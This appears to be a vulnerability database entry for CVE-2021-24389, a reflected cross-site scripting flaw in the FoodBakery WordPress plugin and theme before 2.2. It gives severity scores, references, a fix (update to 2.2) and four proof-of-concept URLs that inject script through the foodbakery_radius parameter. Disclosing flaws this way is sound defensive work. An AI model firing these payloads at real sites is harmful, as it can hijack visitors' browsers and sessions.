Description
The plugin, used in the theme did not properly sanitize the foodbakery_radius parameter before outputting it back in the response, leading to an unauthenticated Reflected Cross-Site Scripting (XSS) vulnerability.
Related
{"id": "WPEX-ID:23B8B8C4-CDED-4887-A021-5F3EA610213B", "type": "wpexploit", "bulletinFamily": "exploit", "title": "FoodBakery < 2.2 - Reflected Cross-Site Scripting (XSS)", "description": "The plugin, used in the theme did not properly sanitize the foodbakery_radius parameter before outputting it back in the response, leading to an unauthenticated Reflected Cross-Site Scripting (XSS) vulnerability.\n", "published": "2021-06-14T00:00:00", "modified": "2021-06-25T07:12:13", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 2.7}, "href": "", "reporter": "Truoc Phan", "references": [], "cvelist": ["CVE-2021-24389"], "immutableFields": [], "lastseen": "2021-09-14T23:11:34", "viewCount": 40, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-24389"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:23B8B8C4-CDED-4887-A021-5F3EA610213B"]}], "rev": 4}, "score": {"value": 4.0, "vector": "NONE"}, "backreferences": {"references": [{"type": "cve", "idList": ["CVE-2021-24389"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:23B8B8C4-CDED-4887-A021-5F3EA610213B"]}]}, "exploitation": null, "vulnersScore": 4.0}, "sourceData": "http://foodbakery.chimpgroup.com/listings/?search_title=&location=&foodbakery_locations_position=filter&search_type=autocomplete&foodbakery_radius=10-alert(document.domain)\r\n\r\nhttp://foodbakery.chimpgroup.com/listings/?search_title=&location=&foodbakery_locations_position=filter&search_type=autocomplete&foodbakery_radius=10%22%3E%3Cscript%3Eprompt(document.domain)%3C/script%3E\r\n\r\nhttp://foodbakery.chimpgroup.com/listings/?search_title=&location=&foodbakery_locations_position=filter&search_type=autocomplete&foodbakery_radius=10-prompt(document.domain)\r\n\r\nhttp://foodbakery.chimpgroup.com/listings/?search_title=&location=&foodbakery_locations_position=filter&search_type=autocomplete&foodbakery_radius=%22%3E%3Cimg%20src%20onerror=prompt(/XSS/)//%3E", "generation": 0, "_state": {"dependencies": 1645953996}}
{"wpvulndb": [{"lastseen": "2021-09-14T23:11:34", "description": "The plugin, used in the theme did not properly sanitize the foodbakery_radius parameter before outputting it back in the response, leading to an unauthenticated Reflected Cross-Site Scripting (XSS) vulnerability.\n\n### PoC\n\nhttp://foodbakery.chimpgroup.com/listings/?search_title=&location;=&foodbakery;_locations_position=filter&search;_type=autocomplete&foodbakery;_radius=10-alert(document.domain) http://foodbakery.chimpgroup.com/listings/?search_title=&location;=&foodbakery;_locations_position=filter&search;_type=autocomplete&foodbakery;_radius=10%22%3E%3Cscript%3Eprompt(document.domain)%3C/script%3E http://foodbakery.chimpgroup.com/listings/?search_title=&location;=&foodbakery;_locations_position=filter&search;_type=autocomplete&foodbakery;_radius=10-prompt(document.domain) http://foodbakery.chimpgroup.com/listings/?search_title=&location;=&foodbakery;_locations_position=filter&search;_type=autocomplete&foodbakery;_radius=%22%3E%3Cimg%20src%20onerror=prompt(/XSS/)//%3E\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "baseScore": 6.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 2.7}, "published": "2021-06-14T00:00:00", "type": "wpvulndb", "title": "FoodBakery < 2.2 - Reflected Cross-Site Scripting (XSS)", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24389"], "modified": "2021-06-25T07:12:13", "id": "WPVDB-ID:23B8B8C4-CDED-4887-A021-5F3EA610213B", "href": "https://wpscan.com/vulnerability/23b8b8c4-cded-4887-a021-5f3ea610213b", "sourceData": "", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "patchstack": [{"lastseen": "2022-06-01T19:31:58", "description": "Reflected Cross-Site Scripting (XSS) vulnerability discovered by Truoc Phan in WordPress FoodBakery premium theme (versions <= 2.1).\n\n## Solution\n\n\r\n Update the WordPress FoodBakery premium theme to the latest available version (at least 2.2).\r\n ", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 6.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 2.7}, "published": "2021-06-10T00:00:00", "type": "patchstack", "title": "WordPress FoodBakery premium theme <= 2.1 - Reflected Cross-Site Scripting (XSS) vulnerability", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24389"], "modified": "2021-06-10T00:00:00", "id": "PATCHSTACK:10B14C2470C44CA2CCED2637F0F2D9FF", "href": "https://patchstack.com/database/vulnerability/foodbakery/wordpress-foodbakery-premium-theme-2-1-reflected-cross-site-scripting-xss-vulnerability", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "cve": [{"lastseen": "2022-03-23T14:53:45", "description": "The WP Foodbakery WordPress plugin before 2.2, used in the FoodBakery WordPress theme before 2.2 did not properly sanitize the foodbakery_radius parameter before outputting it back in the response, leading to an unauthenticated Reflected Cross-Site Scripting (XSS) vulnerability.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 6.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 2.7}, "published": "2021-07-06T11:15:00", "type": "cve", "title": "CVE-2021-24389", "cwe": ["CWE-79"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24389"], "modified": "2021-07-09T14:33:00", "cpe": [], "id": "CVE-2021-24389", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-24389", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": []}]}
FoodBakery < 2.2 - Reflected Cross-Site Scripting (XSS)
